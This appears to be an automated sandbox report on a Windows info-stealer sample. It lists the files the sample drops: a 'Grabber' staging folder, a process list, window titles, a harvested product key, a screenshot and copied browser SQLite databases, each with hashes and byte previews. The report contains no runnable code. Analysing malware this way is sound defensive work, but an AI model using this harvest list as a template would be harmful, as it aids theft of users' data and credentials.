                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):282
                                                            Entropy (8bit):3.5191090305155277
                                                            Encrypted:false
                                                            SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                            MD5:3A37312509712D4E12D27240137FF377
                                                            SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                            SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                            SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):190
                                                            Entropy (8bit):3.5497401529130053
                                                            Encrypted:false
                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                            MD5:D48FCE44E0F298E5DB52FD5894502727
                                                            SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                            SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                            SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):190
                                                            Entropy (8bit):3.5497401529130053
                                                            Encrypted:false
                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                            MD5:87A524A2F34307C674DBA10708585A5E
                                                            SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                            SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                            SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):3.514398793376306
                                                            Encrypted:false
                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                            MD5:29EAE335B77F438E05594D86A6CA22FF
                                                            SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                            SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                            SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\System\Process.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):24151
                                                            Entropy (8bit):5.729198328070191
                                                            Encrypted:false
                                                            SSDEEP:96:kwJsH6HxH5HkdHe6fpHvHlhtHtHjHgFypez6pyHfHKFHmHZHZ/5garugHaBZpOdZ:Dq5oJiuk/tG5Dz3LCV5uxxYSbb0r2
                                                            MD5:9B2E477A0845341F459737912DF9A7D3
                                                            SHA1:9939FDB448F742824C6A335A39A3C7FC1288E6B0
                                                            SHA-256:8E16FF6A9AC9C4BCE47274431C2CD03C4A95F9A857AD8705256A29B5CDCC158C
                                                            SHA-512:B9030A01B6DD2FC16116ACA1C4A9619C89EE941E8283F2D28261AEA292D4B4EA86A4A5546DF4EF897592D8DCD1E9E450B0EE1CE17A858AEBBE22C2FA768BDF96
                                                            Malicious:false
                                                            Preview:NAME: StartMenuExperienceHost..PID: 4740..EXE: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..PID: 7756..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..PID: 7488..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..PID: 5168..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..PID: 7320..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..PID: 2968..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbia

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\System\ProductKey.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):29
                                                            Entropy (8bit):3.978333581185264
                                                            Encrypted:false
                                                            SSDEEP:3:sI7m+1yAdAE:1mOyy
                                                            MD5:A477844F136DD25FD0D1CDCC2EC91DB4
                                                            SHA1:6EF14C441FE7A8DFEE6B7E3B9CD77303E40DA9D4
                                                            SHA-256:605A0FC7303CADD8A79C063098FB8521EADAA7D909F65756CF8DE17710B15655
                                                            SHA-512:91A931296F5009D000B6F97C4FC580182B89DE7BB986118C94130CEC0AD2FB476251B5022A1C59163159A18FD02C931CF1E729BF60285ABD51A3E77B5C9B7CD0
                                                            Malicious:false
                                                            Preview:293MD-2NCHV-V6XWG-M48F4-3GQMG

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\System\ScanningNetworks.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):84
                                                            Entropy (8bit):4.6630509827051725
                                                            Encrypted:false
                                                            SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                            MD5:58CD2334CFC77DB470202487D5034610
                                                            SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                            SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                            SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                            Malicious:false
                                                            Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\System\Windows.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):20652
                                                            Entropy (8bit):5.671979148545095
                                                            Encrypted:false
                                                            SSDEEP:96:N+VVwdqVD55RXUeyW+jWF6tNckgXE2FSdnUwr1XvCMasK5iSnTkmrsLpqrXt1HEa:C+zaf
                                                            MD5:0BD0B509DFDC92C873CBDD9376DB6FEB
                                                            SHA1:1545843737AAB193C3FE5E4CA3A0762559A6B19A
                                                            SHA-256:535D8022EAF01492BE88009C54F81E1388D529B00EEE946D70740768EE6C7DC1
                                                            SHA-512:46A5CEB0C436CAA93D958FB331E4D016F65FB1D70DA25E7DA6D9EAC110E3611D98F7545E521121CF7D41F0DBC33E879E19C73543FE78B8B159C3DEFFB8D7C864
                                                            Malicious:false
                                                            Preview:NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 7756..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 7488..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 5168..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 7320..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 2968..EXE: C:\Program Files (x86)\BpwDwJKSZ

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\System\WorldWind.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                            Category:dropped
                                                            Size (bytes):73314
                                                            Entropy (8bit):7.803402782461037
                                                            Encrypted:false
                                                            SSDEEP:1536:CdZHFuIQSy/281yqdPRC+33x744q5KuxmeAiB9nK:+Zxjy/2819y+x744q5KAmeAi3nK
                                                            MD5:1E45FEE305D5599EB5F797C6C9C8F8BC
                                                            SHA1:816BC0081EB5A5655A05D70A90D27206648E3FCD
                                                            SHA-256:560DEB6BEE6F394FF1118CA834B8D9C620AF1041C55CD0EF57DD0098B9BB37F2
                                                            SHA-512:77194E79C8B4E52B24E47E412462704FBE9E32AA8655A25E98D3ED06159C8760BCECCFB1A58731429CD6204C0B7146A0BC2CBD0CA18C5E2B36720C0A560583BA
                                                            Malicious:false
                                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

                                                            C:\Users\user\AppData\Local\Temp\places.raw

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):5242880
                                                            Entropy (8bit):0.03799545499236577
                                                            Encrypted:false
                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZru/bNb/fc3DDTnHI:58r54w0VW3xWZrwbFHc3T
                                                            MD5:96AB9233CA2AB3982F98B1BA44CFFE32
                                                            SHA1:A72C6AF1881274392B7D73594D78C4D3F1B91428
                                                            SHA-256:C764FE5DA2665335A3C2E60091F08E21A16CEC35EFD453AE092FEB1D7C3D69BC
                                                            SHA-512:E09E96834C049E56FE5E9A56BA1635CA6A4FB5DF2F2EB8F339C94D4BCF2D24150592B2833D084BD4BD7D0319B4D5C493B5B49A64310E084684375D645DD8CEEC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD5A3.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.1368932887859682
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                            MD5:9A534FD57BED1D3E9815232E05CCF696
                                                            SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                            SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                            SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD5E2.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD5F3.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):159744
                                                            Entropy (8bit):0.5394293526345721
                                                            Encrypted:false
                                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD604.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):159744
                                                            Entropy (8bit):0.5394293526345721
                                                            Encrypted:false
                                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD614.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.1368932887859682
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                            MD5:9A534FD57BED1D3E9815232E05CCF696
                                                            SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                            SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                            SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD635.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1211596417522893
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD645.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1211596417522893
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD656.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD657.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):155648
                                                            Entropy (8bit):0.5407252242845243
                                                            Encrypted:false
                                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                            Malicious:false
